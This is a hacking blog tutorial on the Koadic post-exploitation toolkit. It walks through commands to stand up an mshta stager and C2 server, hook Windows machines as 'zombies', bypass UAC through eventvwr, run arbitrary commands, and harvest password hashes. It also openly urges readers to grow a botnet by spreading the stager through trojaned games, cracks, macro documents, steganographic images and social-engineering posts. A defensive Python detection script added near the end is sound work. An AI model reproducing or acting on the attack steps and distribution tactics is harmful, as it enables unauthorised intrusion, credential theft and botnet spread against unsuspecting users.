CyberMorans
The Koadic post-exploitation toolkit serves as an alternative to tools like Meterpreter and PowerShell Empire. While there are some differences in how payloads and exploits are delivered, Koadic provides a fully featured environment for remotely performing tasks on an exploited Windows system.
Koadic provides two categories of functions: stagers and implants.
These allow hackers to monitor and control exploited Windows systems remotely. The tool facilitates remote access to Windows devices via the Windows Script Host and works with practically every version of Windows. It does this entirely in memory to evade detection, and it is also able to encrypt its own web C2 communications.
Stagers are used to create the actual remote-access connections through different Windows-based processes, and implants are used to complete tasks on systems that are already connected as zombie machines over the stager connection.
These implants can execute commands, retrieve system keys and password hashes, play video and even take pictures with the webcam on the zombie device.
So, Morans, let's do this.
Set up Koadic
Koadic can be started by entering the following on the terminal:
koadic
The most useful command for an overview of how to use Koadic is 'help'.
The 'help' command lists the different commands available. Koadic functions similarly to other frameworks such as Metasploit: individual modules are loaded and configured, and once a module is selected and its parameters are set, the module can be run. Koadic also provides autocomplete, triggered by pressing Tab, just like Metasploit and Meterpreter.
First, load the mshta stager by running:
use stager/js/mshta
The stager lets us define where the Koadic command and control (C&C) is reached by any "zombie" devices. You can view these settings by running 'info' once the stager is selected.
The stager allows us to define the IP, port and expiry date of the C&C, as well as keys and certificates if desired. The default port is 9999. Confirm that the "SRVHOST" IP value corresponds to your IP on your local network, or to the VPS or server that Koadic is running on. To set it manually, run the command below, where IP is the desired IP address for the staging server:
set SRVHOST IP
Once the staging server is configured, it's ready. Launch the stager by typing 'run' on the Koadic command line and hitting Enter.
Hook your first Zombie PC to the C&C
A Windows PC can be connected to the Koadic "mshta" staging server by running just one line in cmd. This command begins with 'mshta' followed by the IP and port of the staging server. The exact command is also printed in the Koadic console after the stager is run:
mshta http://192.168.0.105:9999/LJgy7
Once this command is run, the Windows device is connected as a zombie to the C&C.
In a real-world attack, the command would generally be executed by another program, a USB Rubber Ducky or an application exploit, rather than simply being run by the user in the command prompt. This also allows you to have a lot of zombies, for a botnet maybe. To grow and propagate this botnet of zombies:
- You can write a bash/shell script that executes the command
- You can use steganography to embed this command in a multimedia file (jpg, png etc.) and share it in a group on WhatsApp or Telegram
- You can use document macros in Word, OneNote and PDFs
- You can use a .exe disguised as a game and share it on Discord or Twitch
- You can use a .scr file, since it works like a .exe but few people know that
- You can disguise it as something interesting and drop it on Pirate Bay: the latest movie, a game crack, or a sextape
- Social engineering and treachery: telling people on Twitter and Facebook to open cmd and enter the command, supposedly to improve their internet connection or check if they can mine crypto
...etc. Get creative and grow that botnet.
Run the mshta command on the target Windows machine.
After the command is run, we can confirm that the zombie is connected by running the 'zombies' command within Koadic.
The first zombie connected is assigned the ID 0 (zero). To view more info on this zombie, run the command:
zombies 0
This device is already pwned, but not yet elevated (privileges).
Next, we'll look at gaining additional user privileges on the zombie machine.
Elevate & Escalate Privileges
To test privilege escalation against the Windows machine, use the "Bypass User Account Control" implant. We can load it by running, within Koadic:
use implant/elevate/bypassuac_eventvwr
Then set the payload value so that the implant has something to run. You can leave the value of "ZOMBIE" as "ALL" to attack all zombies, or set it to the specific zombie you wish to attack. To adjust the payload value, run the command:
set PAYLOAD 0
After the payload is set, we can launch the UAC bypass attempt by simply executing 'run' from the Koadic command line.
When the task is complete, check whether the privilege escalation was successful by looking at the zombie information. To see the status of the first zombie device, run the 'zombies 0' command.
When the "Elevated" status shows "YES!", the Windows device is hooked and privilege escalation is complete.
Koadic Post-Exploitation Implants
Now that we have an exploited device with elevated privileges, there are a number of rootkit-style functions we can perform from the Koadic C&C. The "implant" modules, as shown below, cover a few of the capabilities available in Koadic.
The "exec_cmd" implant allows you to run any command on the Windows system. To load this implant, run the command:
use implant/manage/exec_cmd
To set a command, use the set command, the same as when changing settings for other modules. To set the command to be run to dir, which returns a list of files and directories, run the command:
set CMD dir
To confirm these settings were changed, run info to view the module information.
Once the implant settings are in place, simply type run and hit Enter to run the module.
Other implants, such as the "gathering" tools shown below, attempt to capture important information such as user account details and password hashes and send them to the command-and-control server.
Koadic also provides several "fun" implants. The "voice" implant uses Windows' integrated text-to-speech tools to "speak" a message on the zombie computer.
To use this implant, first run 'use implant/fun/voice'. The message can be set with 'set MESSAGE' followed by the desired message to be spoken. The specific zombies can be set in the same way as in the previous modules, or left at the default value of "ALL" to run on all zombies. Type 'run' and hit Enter.
While these attacks have mixed success, the majority of the rootkit implants are very effective, even on modern versions of Windows. The limited detection possibility and the potential for automation using Python scripts establish Koadic as a potent remote-access toolkit capable of carrying out complex attacks.
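The three behaviours this post walks through each leave a visible trace in process-creation telemetry: the stager is a bare mshta.exe pulling a remote http:// URL (the command shown in the "Hook your first Zombie" section), the eventvwr UAC bypass runs something other than the normal mmc.exe under eventvwr.exe, and exec_cmd results in the script host spawning a command shell. The following Python is an added defender-side example written for this post; it is not part of the original post and not Koadic's own code. The pipe-separated key=value log format is my own invention for the sample, the sample events are constructed, and the parent/child heuristics are my assumptions about how these techniques look in Sysmon-style Event ID 1 data, not something the post states.

```python
"""Flag Koadic-style activity in constructed process-creation events.

Added example for this post (not the author's or Koadic's code).
Assumed log layout: one event per line, 'Key=Value' pairs joined by '|'.
Keys used: Image, ParentImage, CommandLine.
"""
import re

# Constructed sample events. The first CommandLine is the stager line
# quoted in the post; everything else is made up for the example.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=mshta http://192.168.0.105:9999/LJgy7",
    "Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=mshta.exe \"C:\\Tools\\local.hta\"",
    "Image=C:\\Windows\\System32\\mmc.exe|ParentImage=C:\\Windows\\System32\\eventvwr.exe"
    "|CommandLine=mmc.exe eventvwr.msc",
    "Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\Windows\\System32\\eventvwr.exe"
    "|CommandLine=cmd.exe /c whoami",
    "Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\Windows\\System32\\mshta.exe"
    "|CommandLine=cmd.exe /c dir",
    "Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=notepad.exe",
]

# mshta fetching its HTA over HTTP(S) rather than from a local file.
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)

# Interpreters a script host should not normally be launching (assumption).
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def parse_event(line: str) -> dict:
    """Split 'Key=Value|Key=Value' into a dict. Values may contain '='."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the detection tags that apply to one parsed event."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    tags = []
    # Stager: mshta.exe given a remote URL on its command line.
    if image == "mshta.exe" and REMOTE_URL.search(cmdline):
        tags.append("mshta_remote_hta")
    # UAC bypass heuristic: eventvwr.exe normally only launches mmc.exe.
    if parent == "eventvwr.exe" and image != "mmc.exe":
        tags.append("eventvwr_unexpected_child")
    # Implant activity: the script host spawning a shell (e.g. exec_cmd -> dir).
    if parent == "mshta.exe" and image in SHELLS:
        tags.append("script_host_spawned_shell")
    return tags


def scan(lines) -> list:
    """Run classify() over raw log lines; return (tag, CommandLine) pairs."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        for tag in classify(event):
            alerts.append((tag, event.get("CommandLine", "")))
    return alerts


if __name__ == "__main__":
    for tag, cmdline in scan(SAMPLE_EVENTS):
        print(f"[{tag}] {cmdline}")
```

The local-file mshta event and the ordinary eventvwr.exe-launching-mmc.exe event are included deliberately so the rules stay quiet on benign use; in a real deployment the same three checks map onto Sysmon Event ID 1 or Windows 4688 fields, and the shell list would be tuned to the environment.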
Conclusion
Subscribe to receive notifications of similar posts, where we will be reverse engineering malware, vulnerabilities as well as hacking tools, vectors, stories, tutorials and other Infosec stuff.
Follow me on Twitter for daily Infosec memes and shenanigans.
Morans,
Thank you for taking the time, and I hope you learned something new. Like and leave a comment/review and, as always, stay awesome!